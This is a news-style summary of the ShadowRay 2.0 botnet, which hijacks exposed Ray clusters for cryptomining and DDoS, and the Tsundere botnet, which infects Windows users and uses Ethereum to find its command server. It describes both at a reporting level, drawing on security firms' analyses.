Cybersecurity Threats: Botnets Targeting Cryptocurrency Users

The emergence of botnets like ShadowRay and Tsundere has raised significant concerns regarding cybersecurity threats targeting cryptocurrency users. ShadowRay 2.0, as reported by The Hacker News, exploits a critical flaw in the Ray open-source AI framework, specifically a missing authentication bug with a CVSS score of 9.8. This vulnerability allows attackers to take control of vulnerable instances, hijacking their computing power for illicit cryptocurrency mining using XMRig. The botnet operates by submitting malicious jobs to an unauthenticated Ray Job Submission API on exposed dashboards, turning compromised Ray clusters into self-replicating cryptomining operations. Notably, over 230,500 Ray servers are publicly accessible, which poses a lucrative attack surface for cybercriminals. Oligo Security highlights that the campaign also weaponizes these clusters for denial-of-service attacks, targeting rival mining pools, thus transforming the operation from mere cryptojacking into a multi-purpose botnet capable of launching DDoS attacks.

On the other hand, the Tsundere botnet, also spotlighted by The Hacker News, targets Windows users and has been active since mid-2025. This botnet executes arbitrary JavaScript code retrieved from a command-and-control server, using a variety of methods for propagation, including leveraging a Remote Monitoring and Management tool to download compromised files. The malware disguises itself using names related to popular games, suggesting that it may be targeting users searching for pirated content. Once installed, the botnet maintains persistence by writing to the registry, ensuring it restarts upon system login.

The Tsundere botnet further distinguishes itself by utilizing Ethereum-based infrastructure for its command-and-control operations. The botnet fetches details of its C2 server through the Ethereum blockchain, providing a resilient mechanism for the attackers to rotate their infrastructure. Kaspersky's analysis reveals that the botnet allows its operators to build new artifacts and manage administrative functions, indicating a sophisticated level of control over the infected systems. The presence of Russian language in the source code suggests that the threat actors behind Tsundere may be Russian-speaking, adding another layer of complexity to the attribution of this cyber threat.

In summary, both botnets represent an alarming trend in the cryptocurrency space, where cybercriminals exploit vulnerabilities to target users and systems. The combination of cryptojacking and additional capabilities like DDoS attacks not only raises concerns for individual investors but also for the broader integrity of the cryptocurrency ecosystem. Enhanced security measures are urgently needed to protect against these evolving threats, as evidenced by the ongoing exploitation of vulnerabilities within widely used frameworks and the clever methods employed by attackers to distribute their malware.